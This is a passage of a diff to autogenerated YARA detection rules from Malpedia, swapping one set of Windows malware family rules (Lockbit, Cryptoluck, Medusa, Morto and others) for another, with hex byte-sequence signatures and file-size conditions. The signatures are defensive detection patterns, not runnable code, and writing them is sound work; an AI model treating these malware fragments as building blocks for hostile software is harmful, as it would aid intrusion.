+		logic_hash = "51a8eff3d0e892d08ca7cb6cb77d8a510f6bbf09ab967ba64d6200c00464e9c5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128631,32 +128548,32 @@ rule MALPEDIA_Win_Molerat_Loader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4db8 c645fc34 e8???????? 68???????? 8d4dbc c645fc35 e8???????? }
-		$sequence_1 = { 51 c645fc42 e8???????? 83c40c }
-		$sequence_2 = { 8b08 8b11 50 8b4204 ffd0 c644243409 8b44240c }
-		$sequence_3 = { 56 a1???????? 33c4 50 8d84241c020000 64a300000000 6804010000 }
-		$sequence_4 = { 8d4c2450 c744242000000000 e8???????? 8d4c241c c644243802 e8???????? 8d442410 }
-		$sequence_5 = { ffb56cffffff c745fc02000000 e8???????? 3bc7 7585 56 ffb56cffffff }
-		$sequence_6 = { ffd0 68???????? 8d8d08feffff e8???????? 8b8508feffff 83c0f0 }
-		$sequence_7 = { c644241c02 8b442410 83c0f0 83c40c 8d500c 83c9ff f00fc10a }
-		$sequence_8 = { 83c40c 68???????? 50 8d4de0 b330 51 885dfc }
-		$sequence_9 = { 8b7d08 57 8d45e0 33f6 50 8975e8 }
+		$sequence_0 = { a804 7409 488d1db94c0300 eb14 a802 488d1dc64c0300 488d05d74c0300 }
+		$sequence_1 = { 4803c8 488bc1 488b4d20 488b95d8000000 488d0c51 4c8bc0 488b4538 }
+		$sequence_2 = { 488b4c2460 898110170000 e9???????? 8b442468 ffc8 488b4c2460 4881c1bc000000 }
+		$sequence_3 = { 4c896310 4d8bc6 48897318 488bcf 4883fd0f 7648 488b33 }
+		$sequence_4 = { e8???????? 488b4c2430 48894c2420 4c8b4c2458 4c8b442460 488b4c2450 488b5110 }
+		$sequence_5 = { e8???????? 88442425 488b8c2480000000 488b09 48634904 488b942480000000 }
+		$sequence_6 = { eb58 b804000000 4869c000010000 488b4c2468 0fb70401 488b4c2460 8b8910170000 }
+		$sequence_7 = { 8b84815c270100 4803c1 ffe0 488b442430 83781000 7511 }
+		$sequence_8 = { 2500e00000 85c0 7424 488b842410010000 488d0de2300400 48894820 488b442430 }
+		$sequence_9 = { 488d54242f 488d4c2458 e8???????? 90 c644243011 488d542430 488d4c2458 }
 
 	condition:
-		7 of them and filesize < 688128
+		7 of them and filesize < 10490880
 }
-rule MALPEDIA_Win_Bachosens_Auto : FILE
+rule MALPEDIA_Win_Cryptoluck_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "21e78cd2-1c72-5a79-a705-15dc4e8e3d2a"
+		id = "d021de73-27cb-5bec-a5d2-3e18a59babc5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bachosens"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bachosens_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoluck"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cryptoluck_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "34aedbb89c2e7af974768523a03e9308ee6c49afb8486001bfd1e9169e8bf87c"
+		logic_hash = "962cd1309df7966b05578e3a6dacac6ddd19906dbb39c069d91052b1b1100225"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128670,32 +128587,32 @@ rule MALPEDIA_Win_Bachosens_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4d8bd4 4d2bdc 4d8bc4 49f7da }
-		$sequence_1 = { 488bf9 488b5018 488b5a20 488bd1 488b4b50 e8???????? }
-		$sequence_2 = { 49f7da 6666660f1f840000000000 430fb61403 410fb608 }
-		$sequence_3 = { 740e 488bc7 ffc1 488d4001 803800 }
-		$sequence_4 = { 33d2 385500 740e 488bc5 ffc2 }
-		$sequence_5 = { 660f1f840000000000 420fb61407 410fb608 8d429f }
-		$sequence_6 = { 41380a 7417 498bc2 660f1f840000000000 ffc1 }
-		$sequence_7 = { 66390a 7417 488bc2 0f1f840000000000 ffc1 488d4002 }
-		$sequence_8 = { 430fb61403 410fb608 8d429f 3c19 }
-		$sequence_9 = { 803800 75f5 3bca 7550 4c63d1 85c9 7e42 }
+		$sequence_0 = { 837d1000 7409 c745d880720010 eb07 c745d878720010 837d1000 7409 }
+		$sequence_1 = { 83c40c 8945f4 6a00 6880000000 6a02 6a00 6a01 }
+		$sequence_2 = { 83ec20 8d45f8 50 8b4d08 51 ff15???????? 8b55fc }
+		$sequence_3 = { 51 837d1801 730f 8b4514 50 }
+		$sequence_4 = { 52 ff15???????? 898504f0ffff 680f040000 8b8504f0ffff 8d8c05e8fbffff }
+		$sequence_5 = { 8b4508 69c0100e0000 99 03c8 13f2 894de8 }
+		$sequence_6 = { f610 57 4c 2434 cd40 0234d2 2d734ce893 }
+		$sequence_7 = { 8b45c8 83c001 8945c8 8b4dc0 83e901 894dc0 ebe0 }
+		$sequence_8 = { 8b4de8 51 8b55fc 2b55f4 52 8b45f8 }
+		$sequence_9 = { ff15???????? 898540ffffff 83bd40ffffff00 7472 8b8d40ffffff 51 8b55e0 }
 
 	condition:
-		7 of them and filesize < 643072
+		7 of them and filesize < 229376
 }
-rule MALPEDIA_Win_Rumish_Auto : FILE
+rule MALPEDIA_Win_Ice_Event_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "db5cf6b1-45f1-5e05-a042-af28c9de660a"
+		id = "efa7e53a-c463-50f7-ba83-6d9ec3219251"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rumish"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rumish_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_event"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ice_event_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "356c30a3a32f94fe03326f490efe36bc56d49a42cedcdbc6774c882ef857a8dc"
+		logic_hash = "ef09062340f20eb30ff347046cee2303e5aa0ba34beeb1b65aa69fb96594e3f6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128709,32 +128626,32 @@ rule MALPEDIA_Win_Rumish_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8908 8b4a04 894804 8b5208 895008 ebd7 5d }
-		$sequence_1 = { c7854cffffff00000000 53 51 52 33c0 0fa2 }
-		$sequence_2 = { 8b55e4 83ea01 3955a4 7d54 8b45a4 }
-		$sequence_3 = { e8???????? 89851cfdffff db851cfdffff dc0d???????? dc35???????? dc05???????? }
-		$sequence_4 = { 0f87c5000000 8b9524fbffff ff2495c0214100 68???????? 8d8dc0fbffff e8???????? }
-		$sequence_5 = { db8590f6ffff d9e8 dec9 d99d8cf6ffff d9858cf6ffff 51 d91c24 }
-		$sequence_6 = { c745fcffffffff 8d4dc0 e8???????? 8b852cfdffff e9???????? e8???????? 898508fdffff }
-		$sequence_7 = { ff15???????? 8b95a0fdffff 89956cfdffff c785b0fdffff00000000 c78544fdffff00000000 eb0f 8b8544fdffff }
-		$sequence_8 = { d99d54ffffff d98554ffffff 51 d91c24 e8???????? 83c404 dc1d???????? }
-		$sequence_9 = { 894de4 8b45e4 c700???????? 8b4de4 c7410400000000 8b55e4 c7420800000000 }
+		$sequence_0 = { 48c74424780f000000 c644246000 488b4598 4883f810 }
+		$sequence_1 = { 3b0d???????? 7326 4863c9 488d15b4080100 488bc1 83e13f }
+		$sequence_2 = { 48c743180f000000 c60300 8bc6 488b4c2478 4833cc e8???????? 4c8d9c2480000000 }
+		$sequence_3 = { 4863f8 4803f7 4983c9ff 4c8bc7 488d542430 488d4dc8 }
+		$sequence_4 = { 4156 4883ec28 488b4210 498bf9 498bf0 }
+		$sequence_5 = { 660f28d1 660f28c1 4c8d0d8b9f0000 f20f101d???????? f20f100d???????? }
+		$sequence_6 = { 488bcb 4a8d1441 482bf5 4c8d3436 }
+		$sequence_7 = { 4833cc e8???????? 488b9c24a0110000 4881c470110000 5f }
+		$sequence_8 = { 8bce 894d30 8bc6 894538 ffc3 83fb3c 0f8c6cffffff }
+		$sequence_9 = { 488bce e8???????? eb55 4c896d68 48c745700f000000 }
 
 	condition:
-		7 of them and filesize < 770048
+		7 of them and filesize < 331776
 }
-rule MALPEDIA_Win_Hzrat_Auto : FILE
+rule MALPEDIA_Win_Medusa_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "67019030-b140-578f-bd57-ed696d61f957"
+		id = "d20a8f8a-0c40-56df-b905-5b8d6ebe61b2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hzrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hzrat_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.medusa_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "e02b803e3f8c380d72f2cad18c6b29e368b4a184be0cb897b06c0987d88951d3"
+		logic_hash = "bf22f346b79f830cfb557e80bea02849fba4fc00ac522de893ed484b5992cd17"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128748,32 +128665,32 @@ rule MALPEDIA_Win_Hzrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83fa10 7202 8b3e a1???????? 89040f c6440f0400 eb20 }
-		$sequence_1 = { 8b46e6 3b42e6 7462 0faee8 0fb67ee6 0fb642e6 2bf8 }
-		$sequence_2 = { 33c0 85c9 0f9fc0 8d0c45ffffffff 85c9 0f8559030000 8b461c }
-		$sequence_3 = { 8b450c 85c0 7416 8b5508 0fb64c02ff 80b91002420000 }
-		$sequence_4 = { 57 6a00 ff15???????? 57 85c0 0f859b000000 }
-		$sequence_5 = { 0f1106 ff15???????? 85c0 0f8484010000 0fb74704 50 ff15???????? }
-		$sequence_6 = { 8b45ec 8d4e14 83c40c 8b7d08 8b55f0 83c72c c645fc01 }
-		$sequence_7 = { 8b4dec 8d0411 8b4de8 33d2 }
-		$sequence_8 = { 8d4123 3bc1 0f86e6000000 50 0faee8 e8???????? 83c404 }
-		$sequence_9 = { 8b450c 50 e8???????? 8bc8 83c40c 894df8 }
+		$sequence_0 = { e1fb 1cc9 3ca5 2c8e a1???????? d528 }
+		$sequence_1 = { ff7100 52 ff7200 53 ff7300 54 }
+		$sequence_2 = { 6a00 4b ff6b00 4c ff6c004d ff6d00 4e }
+		$sequence_3 = { 0050ff 7000 51 ff7100 }
+		$sequence_4 = { 53 ff7300 54 ff740055 ff7500 56 }
+		$sequence_5 = { 8b4c6386 8608 5f e1fb 1cc9 3ca5 2c8e }
+		$sequence_6 = { 0c48 b5f9 43 324dd5 1ddf859f31 }
+		$sequence_7 = { 0000 aa 05854cffab 004893 }
+		$sequence_8 = { 05854cffab 004893 3eb35b 813bf80937dc 8b4c6386 }
+		$sequence_9 = { 1cc9 3ca5 2c8e a1???????? d528 32f4 }
 
 	condition:
-		7 of them and filesize < 409600
+		7 of them and filesize < 1720320
 }
-rule MALPEDIA_Win_Bluehaze_Auto : FILE
+rule MALPEDIA_Win_Sunorcal_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1fd1249e-5be9-518c-b471-fb529bb8c9ae"
+		id = "6c432810-e8f0-5844-8d29-cb8f4d1dde8c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluehaze"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bluehaze_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunorcal"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sunorcal_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "09fb1421d27d0a64efc13cfb683dac14a3c5bd0c2192d0b84f6a45513276dafa"
+		logic_hash = "5b9405aaca8472dd7d7babc873d4fa797ade7b01d47ace52674d0f1fda5d55c6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128787,32 +128704,32 @@ rule MALPEDIA_Win_Bluehaze_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85ff 7405 8b4dec 890f 83c704 897dd8 3b5604 }
-		$sequence_1 = { 894704 8b4804 8901 837dcc10 c745fcffffffff 720c }
-		$sequence_2 = { 51 c745fc00000000 e8???????? 83c408 837de810 720c 8b55d4 }
-		$sequence_3 = { c706???????? 8bc6 5e 8be5 5d c3 8d45fc }
-		$sequence_4 = { 33d2 eb02 8b10 8b4518 85c0 740c }
-		$sequence_5 = { 03ce 51 8b4b6c 57 51 ff15???????? }
-		$sequence_6 = { c706???????? e8???????? 6a30 c745fc00000000 c7462000000000 e8???????? 83c404 }
-		$sequence_7 = { 53 8d9564feffff 52 8d8dd4feffff e8???????? 8b7010 838d20feffff01 }
-		$sequence_8 = { c747140f000000 895f10 881f 833e10 7315 8b56fc }
-		$sequence_9 = { e8???????? 83c404 c785ccfeffff0f000000 899dc8feffff 889db8feffff c645fc03 39b578feffff }
+		$sequence_0 = { 5b c21000 8b442404 8b00 813863736de0 752a 83781003 }
+		$sequence_1 = { 6a03 e8???????? cc 55 8bec 83ec0c }
+		$sequence_2 = { 6a03 e8???????? cc 55 8bec 83ec0c a1???????? }
+		$sequence_3 = { 68b7000000 ff15???????? 6a64 68???????? 6a67 }
+		$sequence_4 = { 68???????? ff15???????? 33c0 c3 c3 55 8bec }
+		$sequence_5 = { ff15???????? 68b7000000 ff15???????? 6a64 68???????? }
+		$sequence_6 = { ff15???????? 6a03 e8???????? cc 55 8bec 83ec0c }
+		$sequence_7 = { c21000 8b442404 8b00 813863736de0 752a 83781003 7524 }
+		$sequence_8 = { c21000 8b442404 8b00 813863736de0 }
+		$sequence_9 = { 7c02 eb0e e8???????? e8???????? 85c0 }
 
 	condition:
-		7 of them and filesize < 424960
+		7 of them and filesize < 172032
 }
-rule MALPEDIA_Win_Unidentified_109_Auto : FILE
+rule MALPEDIA_Win_Multigrain_Pos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b6061e05-3237-58ca-ad8b-3aa8b32dd728"
+		id = "f032b4ba-8128-5978-8559-debc3caa42cc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_109"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_109_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.multigrain_pos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.multigrain_pos_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "d68f70d66f63488c08e0a968d9091c8e5c1c07bcbe7d2942849c574944ebfcba"
+		logic_hash = "57d310c472fb68cb78caa9b432b3db45871bc6e9132f2a98edf83ac773bc72f9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128826,32 +128743,32 @@ rule MALPEDIA_Win_Unidentified_109_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bc8 d1e8 410bc1 83e101 41ffc8 894204 448bc9 }
-		$sequence_1 = { 488bd9 418bf9 498bf0 448bd2 b1e4 85d2 }
-		$sequence_2 = { 418bc8 0bcb 41c1c01e 418bd1 4123cb c1c205 0bc8 }
-		$sequence_3 = { 410fb7c0 6641ffc0 c644080433 664585c9 0f84e0000000 410fb7c0 6641ffc0 }
-		$sequence_4 = { ffc8 410f48c6 4585c0 7e38 4898 660f1f440000 493bc6 }
-		$sequence_5 = { 0fb6d2 83e27f 8d041a 3bc6 0f8742010000 85d2 7416 }
-		$sequence_6 = { 7453 85db 744b 48897c2430 0f1f4000 498d8ef8000000 488bd6 }
-		$sequence_7 = { 488945d0 488945d8 488945e0 488d4de8 498bd9 418bf6 4c8975f8 }
-		$sequence_8 = { 790a c705????????00000000 488d0dfaf80400 ff15???????? 85db 488b5c2420 7441 }
-		$sequence_9 = { 8bc1 448bc1 2bc6 03c2 413bc1 77de 03ca }
+		$sequence_0 = { 50 68???????? eb25 807dec00 7504 33c9 }
+		$sequence_1 = { 8b13 50 8d8d6cffffff e8???????? 83ec18 }
+		$sequence_2 = { 66894508 720b ff7520 e8???????? 83c404 8ac3 }
+		$sequence_3 = { c746140f000000 c7461000000000 68???????? 8bce c745fc00000000 }
+		$sequence_4 = { c7411000000000 50 c60100 e8???????? 8d8da4feffff }
+		$sequence_5 = { 83f908 720d 8b0e 50 8d145a e8???????? eb2c }
+		$sequence_6 = { e8???????? 68???????? 8bd0 8d4dd8 c645fc03 e8???????? }
+		$sequence_7 = { 1bc0 f7d8 5e 5d c20800 85f6 750f }
+		$sequence_8 = { 50 888534ffffff 8d8535ffffff 50 e8???????? 83c40c }
+		$sequence_9 = { 837d1c10 8bd8 8d4508 0f434508 56 }
 
 	condition:
-		7 of them and filesize < 723968
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Cloud_Duke_Auto : FILE
+rule MALPEDIA_Win_Funny_Dream_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e419e016-f5fc-54fd-9e45-72cf3dfc672c"
+		id = "7c5b8541-25d5-552c-920a-b086563867d9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloud_duke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cloud_duke_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.funny_dream"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.funny_dream_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "fda6f38613671be0889a1aab772fc69d0cd906ec00d4774d2302c1e1bbcac11b"
+		logic_hash = "d6d8f879d884c791eab9cf877f711b463f1b8fd3433301e06ffb4b2f059a3774"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128865,32 +128782,32 @@ rule MALPEDIA_Win_Cloud_Duke_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b8a88e8ffff 33c8 e8???????? 83c008 8b4af8 33c8 }
-		$sequence_1 = { 89442420 742b 48 89442414 6aff 6a00 57 }
-		$sequence_2 = { e8???????? 51 8bc8 c645fc13 e8???????? 83c404 c645fc11 }
-		$sequence_3 = { 897da4 6a13 6a00 68???????? 8bce e8???????? 83f8ff }
-		$sequence_4 = { 83e4f0 6aff 68???????? 64a100000000 50 81ec2c020000 }
-		$sequence_5 = { 50 c784240c010000ffffffff e8???????? 8b842404010000 f7d0 39442428 0f8599060000 }
-		$sequence_6 = { 75f5 e9???????? 83f805 0f85b8020000 }
-		$sequence_7 = { 8bf0 e8???????? 83c414 39b42418010000 0f8572000000 6a44 }
-		$sequence_8 = { 668906 8945fc 8b4310 8b7e10 83c007 c745f001000000 3bf8 }
-		$sequence_9 = { 0f57c0 0f43842420010000 51 8d8c24a0010000 }
+		$sequence_0 = { ff15???????? 8bd8 c745f025735c2a 56 8d45f0 }
+		$sequence_1 = { 8d7f01 88443bff 84c0 75f3 8b4df8 }
+		$sequence_2 = { 50 8d4701 c785e0f5ffff0a000000 50 }
+		$sequence_3 = { 50 e8???????? 68ff010000 8d85fdfdffff 6a00 }
+		$sequence_4 = { f3a4 50 e8???????? 8b742414 83c408 85c0 748d }
+		$sequence_5 = { 83bdacfeffff00 744b 8d85a0feffff c785a0feffff00010000 50 ffb59cfeffff }
+		$sequence_6 = { 57 8bf9 6a00 8db750100000 56 ff15???????? 85c0 }
+		$sequence_7 = { 56 8b7508 57 8b3d???????? 6aff ff7608 ffd7 }
+		$sequence_8 = { 53 8a4810 8d4602 50 884e01 e8???????? 8b4508 }
+		$sequence_9 = { 0f118424e0000000 0f10842458010000 0f118424f0000000 e8???????? 898424c8000000 8b4508 }
 
 	condition:
-		7 of them and filesize < 368640
+		7 of them and filesize < 393216
 }
-rule MALPEDIA_Win_Morto_Auto : FILE
+rule MALPEDIA_Win_Coronavirus_Ransomware_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8b5b99ce-9055-5caf-9153-d6b5f44f1d51"
+		id = "6151d4f1-97cc-5312-ae6b-4a65c017356c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.morto"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.morto_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coronavirus_ransomware"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.coronavirus_ransomware_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "3f690f88537e995c1dc2e4101db7568f5b1a20d460c6735cbb429d69f53136bf"
+		logic_hash = "12ada14137bab3268f52ca487b70dc117c439c16c715b2ea437f3cb7436cd1a9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -128904,34 +128821,34 @@ rule MALPEDIA_Win_Morto_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 e8???????? 59 8d8594fdffff 59 56 50 }
-		$sequence_1 = { 8bf9 760c 8a4d10 280c30 40 3b450c }
-		$sequence_2 = { 0f859f020000 53 57 8ac0 33db ba25537973 }
-		$sequence_3 = { ff55ec 53 6a04 ff55e4 6a01 }
-		$sequence_4 = { 6a01 68???????? ff35???????? a3???????? e8???????? 83c438 }
-		$sequence_5 = { 3bc3 59 0f843e010000 8d4dbc 51 50 }
-		$sequence_6 = { c20c00 b8???????? e8???????? 81ec38020000 53 56 57 }
-		$sequence_7 = { 50 6a00 ff15???????? 85c0 894704 742a 83c005 }
-		$sequence_8 = { b9???????? e9???????? 55 8bec b86c260300 }
-		$sequence_9 = { 8b450c 68???????? c745f44d61696e c745f854687265 ff30 c745fc61640000 ff15???????? }
+		$sequence_0 = { 8b7dbc 2bfb 1bc6 8945d0 8b4dc8 8d140b }
+		$sequence_1 = { 83c404 85f6 746a 803e00 7465 33c0 33d2 }
+		$sequence_2 = { 8b35???????? 83c404 85f6 746a 803e00 }
+		$sequence_3 = { 90 8b55ec 8b45f0 6a00 b9???????? 81e9???????? }
+		$sequence_4 = { e8???????? 83c404 6a00 6a00 0fb60d???????? 8b148d78954100 52 }
+		$sequence_5 = { 33f6 56 56 6a03 56 6a03 56 }
+		$sequence_6 = { ffd0 6800200000 8d85f8deffff 50 ff15???????? }
+		$sequence_7 = { 85db 0f84cd010000 c745fc01000000 8975e4 }
+		$sequence_8 = { b8???????? e8???????? 8d4df0 51 8d55a0 52 }
+		$sequence_9 = { ff15???????? 8b35???????? 83c418 68???????? ffd6 68???????? ffd6 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 235520
 }
-rule MALPEDIA_Win_Lockbit_Auto : FILE
+rule MALPEDIA_Win_Ahtapot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4ed7dbc7-3585-5c20-a9ac-479c38ded866"
+		id = "30983b3b-d2d6-5541-9384-47b5921b3fc8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lockbit_auto.yar#L1-L210"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ahtapot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ahtapot_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "d83c3bb6fdeb9666252e892916a121a76bca2329b4383b39f3b9be802c917095"
+		logic_hash = "7f340dfa857e7f52e8c2b134f735bba10e8c0df571d4ec73a1af949780ad4400"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -128943,43 +128860,32 @@ rule MALPEDIA_Win_Lockbit_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 66ad 90 6683f841 720b 6683f85a 7705 }
-		$sequence_1 = { 7407 3d9bb4840b 7518 8b4e0c 03cb }
-		$sequence_2 = { 6a00 6a00 6800000040 ff75d4 }
-		$sequence_3 = { 8bec 81ec7c030000 53 56 57 8d9d84fcffff }
-		$sequence_4 = { 66b82000 f266af 85c9 7512 }
-		$sequence_5 = { 8d8550fdffff 50 6a00 ff15???????? }
-		$sequence_6 = { 33c0 8d7df0 33c9 53 }
-		$sequence_7 = { 660f73f904 660fefc8 0f28c1 660f73f804 }
-		$sequence_8 = { 50 8d45fc 50 ff75fc ff75f4 }
-		$sequence_9 = { 33d0 8bc1 c1e810 0fb6c0 c1e208 }
-		$sequence_10 = { 5b 8907 897704 894f08 89570c f745f800000002 740c }
-		$sequence_11 = { 47 4e 85f6 75d2 5d 5f 5e }
-		$sequence_12 = { 03d0 90 85c0 75e1 8bc2 5e 5a }
-		$sequence_13 = { 89570c f745f800000002 740c 5f 5e b801000000 }
-		$sequence_14 = { 57 8d9d84fcffff b900c2eb0b e2fe e8???????? 53 }
-		$sequence_15 = { ff759c 8d858cfeffff 50 ff7610 51 e8???????? 83c628 }
-		$sequence_16 = { 8d45f4 50 6a00 6a00 ff15???????? }
-		$sequence_17 = { 8bfb 895830 33fe 897834 8bf7 }
-		$sequence_18 = { 894f64 33d6 8b7510 895768 8bda }
-		$sequence_19 = { 740b 83e904 8b040e 89040f }
-		$sequence_20 = { 740b 83e902 0fb7040e 6689040f f6c204 7409 83e904 }
+		$sequence_0 = { c1fa05 8bc2 c1e81f 03d0 b814000000 2bc2 0fb7542410 }
+		$sequence_1 = { 51 8d9580fbffff 52 8d8570f7ffff 68???????? 50 ffd7 }
+		$sequence_2 = { 8d842494000000 6683383f 7508 ba20000000 668910 41 66399c4c94000000 }
+		$sequence_3 = { bf00000800 7413 893d???????? 833b02 7422 }
+		$sequence_4 = { 69c9e8030000 51 ff15???????? 80bec412000000 0f8504fbffff 33c0 8b8c24d8120000 }
+		$sequence_5 = { 7cb7 3d00010000 740a c786a4af060028a74200 8a55fc 8894303c1b0000 8d8eb41e0000 }
+		$sequence_6 = { 0f8494000000 8d85bcf7ffff 8d5002 8d642400 668b08 83c002 6685c9 }
+		$sequence_7 = { 889d65cbffff 89954ccbffff 898550cbffff 899d28cbffff 899d38cbffff 899d48cbffff }
+		$sequence_8 = { 75df 8d85d0fdffff 50 ffd3 8b4dfc 5f 5e }
+		$sequence_9 = { 899d70cbffff 899568cbffff 899d60cbffff 3bf3 7533 8b8518cbffff 8b4804 }
 
 	condition:
-		7 of them and filesize < 2049024
+		7 of them and filesize < 430080
 }
-rule MALPEDIA_Win_Vx_Rat_Auto : FILE
+rule MALPEDIA_Win_Anel_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "819f769e-28ec-57e1-97b7-877072140604"
+		id = "6aaa2dab-4b34-505d-ab57-a83be80c60ae"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vx_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vx_rat_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.anel_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "97c6bacd6a4877ccea5be5ba5b0fe3c6e6fc6df11d41b5e80278399e84bfb336"
+		logic_hash = "bf88932655884d72c230c9a3ca2d9886c485937f46465847549f25d9f3a65ea5"
 		score = 75
 		quality = 75
 		tags = "FILE"
